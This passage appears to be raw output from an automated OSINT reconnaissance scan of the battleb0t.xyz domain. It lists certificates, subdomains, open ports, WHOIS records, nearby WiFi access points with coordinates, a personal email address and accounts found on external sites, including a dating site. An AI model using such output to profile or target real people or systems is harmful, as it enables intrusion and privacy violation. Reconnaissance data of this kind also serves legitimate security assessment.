u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
| 2023-05-12 03:03:35 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00jew.github.io |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:74:79:C8:F8) | 41.8781, -87.6298 |
| 2023-05-12 02:54:20 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
67:78:0f:c0:b3:05:0b:42:0e:1c:78:58:8a:88:56:0d
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Nov 17 08:19:18 2022 GMT
Not After : Feb 15 08:19:17 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:a3:01:61:a3:c8:87:25:e7:fe:c0:1a:32:3c:c6:
da:64:8b:b5:50:60:2b:c0:e8:58:1f:54:74:29:d7:
0b:35:57:ae:f0:78:a5:6a:4d:cb:a8:98:c4:c6:08:
24:6e:38:c0:cc:16:fb:e7:ce:21:ed:5f:2c:c4:e9:
e1:ff:82:8a:ca:a0:fe:ce:4a:08:f4:8a:91:e3:98:
af:3f:35:a0:b7:82:16:66:79:8f:d4:5d:c4:1a:c4:
1c:5a:e2:e2:40:e3:be:d7:73:e5:51:b3:f0:08:0d:
a6:31:11:c5:bc:1d:5c:d2:b0:47:24:f8:d9:1e:d9:
72:fd:86:0b:d6:ac:4a:39:ad:f4:43:e7:b6:d3:16:
b9:d1:e5:c9:06:1d:ce:7c:25:06:4b:96:f2:9e:cb:
95:bc:80:ba:d7:9a:27:c3:51:67:b3:b0:6a:3f:9a:
e8:0b:b4:16:de:be:54:b1:18:14:ad:76:c7:23:c1:
08:4f:b6:99:58:df:3e:de:3d:0b:39:ef:c8:1d:bd:
ed:09:cf:81:92:ec:d8:74:46:47:9c:a4:42:fc:96:
89:c3:55:1e:f4:e7:49:b0:1d:55:06:19:4e:28:13:
c2:a1:7a:ff:d1:4f:38:19:a3:e0:4d:5a:68:ce:ea:
96:c0:01:60:48:f3:a6:ac:5d:db:48:50:b3:86:27:
96:7d
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
61:B8:A8:F3:B0:F5:FF:35:6D:A7:1D:C8:69:9E:4B:49:3E:DA:20:38
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/_haK7tXOc_M
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/QAbdIRPj4FY.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
33:ae:dc:a9:41:b2:ff:76:d8:16:a0:d6:b1:5d:1b:db:3c:51:
93:a6:fd:af:36:c1:59:1e:4b:0d:e6:0a:68:f5:5b:67:34:d6:
7c:a2:8f:90:10:2f:aa:b0:12:bb:81:fd:67:15:ed:d9:15:c1:
8f:5d:b8:52:a6:bc:40:4e:a4:3f:43:ef:65:92:60:20:d0:12:
48:ce:4b:b9:00:fd:36:8b:76:61:50:e7:da:3c:1a:3a:5f:db:
72:c2:bd:1e:38:be:f8:8e:de:f4:a4:78:e4:01:fa:06:51:d3:
6a:dc:fa:a9:19:00:c1:ae:b4:9f:af:62:50:c9:10:65:a2:ca:
97:5d:f7:7c:0c:f6:19:9f:39:9c:60:58:85:b8:8d:be:0a:5d:
7e:8f:0f:cd:3f:06:a9:b3:21:ec:e6:b3:e0:c5:3a:b8:3f:7c:
01:a3:c7:7d:dc:0a:7a:49:a1:6a:53:99:e3:04:53:97:7c:d1:
e8:e0:e6:80:50:bc:c9:d5:7f:a1:e4:1f:6b:f6:56:fd:81:32:
7b:6a:77:24:be:21:62:cb:d5:73:03:e6:d0:24:96:0d:16:ad:
36:c7:39:57:be:6a:0c:e1:3c:be:e8:78:08:a6:c6:71:fa:55:
b9:72:10:a6:f0:bd:1e:37:78:64:35:f8:06:57:c1:5e:e2:2e:
f5:04:6b:a3
| battleb0t.xyz |
| 2023-05-12 03:01:49 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.110.153:443 | 185.199.110.0/24 |
| 2023-05-12 02:56:54 | IPv6 Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 2606:4700:3031::6815:6a6 | www.ayhu.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | 1001mem (Category: social)
http://1001mem.ru/login | login |
| 2023-05-12 02:59:49 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 2 | 0 | None | bradsdevemail@gmail.com | [{"platform": "Chrome", "version": "1.0", "data": {"entrypoints": {"chrome.cookies.get": {"/tmp/fcnbnbmppjiehikhcaalfjmopkpfaeji_1.0/options.js": [53, 110], "/tmp/fcnbnbmppjiehikhcaalfjmopkpfaeji_1.0/service-worker.js": [36, 113], "/tmp/fcnbnbmppjiehikhcaalfjmopkpfaeji_1.0/redirect.js": [18, 78, 144]}, "chrome.tabs.query": {"/tmp/fcnbnbmppjiehikhcaalfjmopkpfaeji_1.0/service-worker.js": [253]}, "chrome.runtime.onMessage": {"/tmp/fcnbnbmppjiehikhcaalfjmopkpfaeji_1.0/options.js": [173]}}, "risk": {"webstore": {"total": 8, "last_updated": 5, "support_site": 1, "rating_users": 1, "users": 1}, "metadata": {}, "total": 460, "csp": {"script-src": 1, "total": 377, "object-src": 1}, "permissions": {"total": 75}}, "extcalls": ["https://fonts.googleapis.com/css?family=Baloo+Bhaina+2|Roboto&display=swap", "https://dayhub.co", "https://gokanto.com/dayhub/getUserProfileData", "https://dayhub.co/app?action=editTasks", "https://dayhub.co?action=signUp", "https://gokanto.com/dayhub/signIn", "https://dayhub.co", "https://dayhub.co/app", "https://dayhub.co", "https://gokanto.com/dayhub/getUserData", "https://dayhub.co/app?action=editTasks", "https://dayhub.co/app?action=editSchedule", "https://dayhub.co/app?action=editSites", "https://dayhub.co", "https://gokanto.com/dayhub/getUserData"], "related": {"nngceckbapebfimnlniiiahkandclblb": {"rating": 4.7743354, "users": 3000000, "platform": "", "short_description": "A secure and free password manager for all of your devices.", "icon": "https://lh3.googleusercontent.com/J_l8abQyJgx7POjRoDfGaFYWFnYQNpRSy4kH5IlbwSdM-l_gZf2rJlk2NLSQTY8g-U2vrclpb0EZApHyOe6sjzbKcUc=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 5229, "name": "Bitwarden - Free Password Manager"}, "gbkeegbaiigmenfmjfclcdgdpimamgkj": {"rating": 3.6818337, "users": 6000000, "platform": "", "short_description": "View and edit Microsoft Word, Excel, and PowerPoint files with Google Docs, Sheets, and Slides", "icon": "https://lh3.googleusercontent.com/nM9DoYWOXecxYlD9b43JTgmjpsSaIAKJ_wHz3fAHysYl_bsVSVVANozLm6dlMVEJ7ZYXx-wydY1IfePdBbjNSQw4=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 5824, "name": "Office Editing for Docs, Sheets & Slides"}, "ohahllgiabjaoigichmmfljhkcfikeof": {"rating": 4.8292074, "users": 1000000, "platform": "", "short_description": "Free and improved AdBlocker. Completely remove ALL ads. No \"acceptable\" ads or whitelisted advertisers, block tracking and malware!", "icon": "https://lh3.googleusercontent.com/AsZW_M_1Unw6wZ0r-Th6HP1bSgo3odQg2jvmPN8z01RUGIli-YLnZwGdqpdjUY_pgFaQW4zgeq9vADQ-S8q1Jq6g7Dw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 47584, "name": "AdBlocker Ultimate"}, "lpcaedmchfhocbbapmcbpinfpgnhiddi": {"rating": 4.0977564, "users": 8000000, "platform": "", "short_description": "Save to Google Keep in a single click!", "icon": "https://lh3.googleusercontent.com/PX16LKTye9cVfZTehEpKSUQgntIvmjuvkh4kWF55rTIYMsdmYZiuZFJq-0ONQHueFpToU4HBlvGS8b_hdQhNhH7OfA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 7621, "name": "Google Keep Chrome Extension"}, "kgjfgplpablkjnlkjmjdecgdpfankdle": {"rating": 3.891328, "users": 8000000, "platform": "", "short_description": "Schedule Zoom meetings directly from Google Calendar", "icon": "https://lh3.googleusercontent.com/EtDJ1WOrJu9vJxqUpk67gAWSsvf7llrIu3UIxOVFQMS6BIxdN3fKOe0NBBHDxVS6G5ov4yxKcxAELtkfhBLMlO7r1Q=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 911, "name": "Zoom Scheduler"}, "laookkfknpbbblfpciffpaejjkokdgca": {"rating": 4.4679146, "users": 3000000, "platform": "", "short_description": "Replace new tab page with a personal dashboard to help you get focused, stay organized, and keep motivated to achieve your goals.", "icon": "https://lh3.googleusercontent.com/H9tXckFzG4jZjM5Ag6gvBl0dCm75uQIlextzqmubbZ4stRiSfAyRG6pna-QjMk4S5kOCeShmPMcWxlPPdKlQyDqW=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 13838, "name": "Momentum"}, "gmbmikajjgmnabiglmofipeabaddhgne": {"rating": 3.9548225, "users": 7000000, "platform": "", "short_description": "Save web content or screen capture directly to Google Drive.", "icon": "https://lh3.googleusercontent.com/TFO5gDBZMhZOyeKAozOLYsxulAwh_RT7qY3vdqKt_8NTMWQjSNRLFc9CjPdkC2MSPimqwSB__nG24HKw4Y1hMdtLLw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 4759, "name": "Save to Google Drive"}, "cjpalhdlnbpafiamejdnhcphjbkeiagm": {"rating": 4.6761365, "users": 10000000, "platform": "", "short_description": "Finally, an efficient blocker. Easy on CPU and memory.", "icon": "https://lh3.googleusercontent.com/rrgyVBVte7CfjjeTU-rCHDKba7vtq-yn3o8-10p5b6QOj_2VCDAO3VdggV5fUnugbG2eDGPPjoJ9rsiU_tUZBExgLGc=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 26400, "name": "uBlock Origin"}, "dagcmkpagjlhakfdhnbomgmjdpkdklff": {"rating": 2.7953382, "users": 2000000, "platform": "", "short_description": "Fast, convenient import of references and PDFs to your Mendeley Reference Manager library.", "icon": "https://lh3.googleusercontent.com/n-KR5-ddPVwU7aEkQYUzyQ1di71jI51yOcMuDD-HBBzRxUSEoS1lie5K8Jydhj5pye21D-OOJqneqn0lB-IFxcoV=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1759, "name": "Mendeley Web Importer"}, "ljflmlehinmoeknoonhibbjpldiijjmm": {"rating": 4.430087, "users": 1000000, "platform": "", "short_description": "Read aloud any Google Doc, PDF, webpage, or book with text to speech (TTS). Natural sounding voices in 30+ languages & 130 voices.", "icon": "https://lh3.googleusercontent.com/aQsKQj8i_4KJsxjKTAzn_ACwmtVbM_p6Mxvh9LDlO-6dcScpIZqQUUxdztFPK0Ftgz7L2yTE6g=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 8482, "name": "Speechify Text to Speech Voice Reader"}, "flliilndjeohchalpbbcdekjklbdgfkk": {"rating": 4.1474295, "users": 6000000, "platform": "", "short_description": "Your surfing made private and secure", "icon": "https://lh3.googleusercontent.com/hjQv8jaFVCyh3Df1rAM6LTeuBY0wOxZAESgsLsysTHGOCQHt5XZP_44v5HM-xIjv-1gVTUHaehBTrF2hoqNcS5RFXK0=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2937, "name": "Avira Browser Safety"}, "pgjjikdiikihdfpoppgaidccahalehjh": {"rating": 4.414451, "users": 2000000, "platform": "", "short_description": "Take a Speedtest directly from your toolbar to quickly test your internet performance without interruption.", "icon": "https://lh3.googleusercontent.com/UeJDiqRqbe61ZwRA-nshMyadO7gt5igLJN5jGy3he_VVP5iELduwit3AdBk9gTnCiDzDIQtlUJv6mQ-V7_7azrShxQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2934, "name": "Speedtest by Ookla"}, "gpdjojdkbbmdfjfahjcgigfpmkopogic": {"rating": 3.558845, "users": 7000000, "platform": "", "short_description": "Save your favorite ideas online so you can easily get back to them later.", "icon": "https://lh3.googleusercontent.com/RHxJoFYLUtCLDgNV64uYMTgTu6NeJpmyV5zAGPcm2H7-WeKEDiDjOsbmpCHhTwhqishCR70OZgXUBWXiyimTTRP7=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 9559, "name": "Pinterest Save Button"}, "noaijdpnepcgjemiklgfkcfbkokogabh": {"rating": 4.390603, "users": 1000000, "platform": "", "short_description": "Translator, Dictionary, Voice", "icon": "https://lh3.googleusercontent.com/5BdJZ8RtA9D8gzY63BejGvZ7Av5RX0iYXYJ0Gv8yoXwK0Qs4vQvafb7eEmfknWvQVU6zGsDw7cs-hxvBJkpuW4Go=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 4959, "name": "ImTranslator: Translator, Dictionary, TTS"}, "aapbdbdomjkkjkaonfhkkikfgjllcleb": {"rating": 4.349156, "users": 10000000, "platform": "", "short_description": "View translations easily as you browse the web. By the Google Translate team.", "icon": "https://lh3.googleusercontent.com/3ZU5aHnsnQUl9ySPrGBqe5LXz_z9DK05DEfk10tpKHv5cvG19elbOr0BdW_k8GjLMFDexT2QHlDwAmW62iLVdek--Q=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 42113, "name": "Google Translate"}, "ihcjicgdanjaechkgeegckofjjedodee": {"rating": 4.053508, "users": 9000000, "platform": "", "short_description": "The fastest and safest web browsing experience.", "icon": "https://lh3.googleusercontent.com/UZPt17v_WaxXDY5u3x8NTx-hQmNVGmOaPSANAWNirF_moQIRGBbRBtKzjl07YWUDlRwGyYUtORJxH7zbgqStxU6utOQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 841, "name": "Malwarebytes Browser Guard"}, "dhdgffkkebhmkfjojejmpbldmpobfkfo": {"rating": 4.7285094, "users": 10000000, "platform": "", "short_description": "The world's most popular userscript manager", "icon": "https://lh3.googleusercontent.com/zoY8FwoOqPlBgFxcmFdNSK2Q4CcLmv-gw7vTjF2KMR9cEabwBsGNrHBTEMitn0Ba6OmCVJ0NcLnFGu3N97BP8Phu0g=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 70345, "name": "Tampermonkey"}, "kbmfpngjjgdllneeigpgjifpgocmfgmb": {"rating": 4.7316957, "users": 1000000, "platform": "", "short_description": "A suite of modules that enhance your Reddit browsing experience", "icon": "https://lh3.googleusercontent.com/0SvxWpFT-d9CLNWqKIjV7_2jOtnBpU8tXCPPqWTr_MvlaFkKlAm5CDpo1uDX1SXWVnrrninjuGsjhF02MDVHWXb3=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 4234, "name": "Reddit Enhancement Suite"}, "ohlencieiipommannpdfcmfdpjjmeolj": {"rating": 4.356376, "users": 1000000, "platform": "", "short_description": "Print Friendly and PDF any Webpage", "icon": "https://lh3.googleusercontent.com/Qg5OD-OnjHXNseuZny1yLGGLdzUjUpxxwf0WHcN28yfpxoOFn17i6a4JIihquQxUA4pp58-UFuiJdEvcIYgdGvDvgw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2329, "name": "Print Friendly & PDF"}, "ndnaehgpjlnokgebbaldlmgkapkpjkkb": {"rating": 4.4497366, "users": 2000000, "platform": "", "short_description": "Email tracker for Gmail & Mail Merge with over 2 million active users. Free and unlimited email tracking.", "icon": "https://lh3.googleusercontent.com/-Qbe0s3I6huZBX4FZbwghJS-NQhR92K0HFmkcz9XxzDYrEjLq4Ig_xKbDk-Jrh2JhSZA5kwJYC74NXcWFEIDeBHH=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 11191, "name": "Email Tracker for Gmail, Mail Merge-Mailtrack"}, "cmeakgjggjdlcpncigglobpjbkabhmjl": {"rating": 4.101554, "users": 1000000, "platform": "", "short_description": "Improving Steam. Items auto-selling. Lowest prices for games and items. Prices from different sources. And a lot more", "icon": "https://lh3.googleusercontent.com/CadrS32EDKBEsKQlULmRC8QFkSwq3Cht4KLP86K6zgeaeJIVipdaQyLAv-UIyi63qFx8GbvnvrptvmxBtfSecWGV-g=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 8882, "name": "Steam Inventory Helper"}, "caljgklbbfbcjjanaijlacgncafpegll": {"rating": 3.9023256, "users": 5000000, "platform": "", "short_description": "Avira Password Manager saves, manages, and syncs all your passwords across all your d |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | FriendFinder-X (Category: dating)
https://www.friendfinder-x.com/profile/login | login |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | default (Net ID: 00:08:5C:63:7B:B5) | 40.2024, 29.0398 |
| 2023-05-12 02:50:19 | Physical Location | No | ipstack | 0 | 0 | 3 | 0 | None | United States | 35.229.48.116 |
| 2023-05-12 02:46:33 | Netblock Membership | No | RIPE | 1 | 0 | 3 | 0 | None | 104.196.16.0/20 | 104.196.30.220 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Marshside Village (Net ID: 00:0F:CC:E2:DF:E8) | 32.8608, -79.9746 |
| 2023-05-12 02:55:15 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 165.232.113.85:22 | 165.232.113.85 |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.187): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:37 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | 677814ebbbc94b77b8833f353c860afe.protect@withheldforprivacy.com | Domain Name: BATTLEBOT.XYZ
Registry Domain ID: D199559633-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://namecheap.com
Updated Date: 2022-09-05T15:48:14.0Z
Creation Date: 2020-09-07T05:35:36.0Z
Registry Expiry Date: 2023-09-07T23:59:59.0Z
Registrar: Namecheap
Registrar IANA ID: 1068
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant State/Province: Capital Region
Registrant Country: IS
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DNS1.REGISTRAR-SERVERS.COM
Name Server: DNS2.REGISTRAR-SERVERS.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:59:45.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: battlebot.xyz
Registry Domain ID: D199559633-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-08-08T05:51:35.56Z
Creation Date: 2020-09-07T05:35:36.00Z
Registrar Registration Expiration Date: 2023-09-07T23:59:59.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 677814ebbbc94b77b8833f353c860afe.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 677814ebbbc94b77b8833f353c860afe.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 677814ebbbc94b77b8833f353c860afe.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:59:45.60Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:52:59 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | Cloudflare Inc. Cloudflare | nwapi2.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:75:F1:53) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:2095 | 188.114.96.1 |
| 2023-05-12 03:09:08 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 165.232.113.92 | 165.232.113.85 |
| 2023-05-12 02:44:15 | SSL Certificate Host Mismatch | Yes | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | *.netlify.app, netlify.app | funny.battleb0t.xyz |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:2087 | 188.114.97.1 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:5D:6A:5B) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:09:37 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 227.30.196.104.bc.googleusercontent.com | 104.196.30.227 |
| 2023-05-12 02:44:19 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2600:1f18:2489:8200::c8 | pics.battleb0t.xyz |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:60:35:51) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | krillnet (Net ID: 00:01:8E:15:D4:A6) | 37.7813933,-122.3918002 |
| 2023-05-12 02:47:08 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': 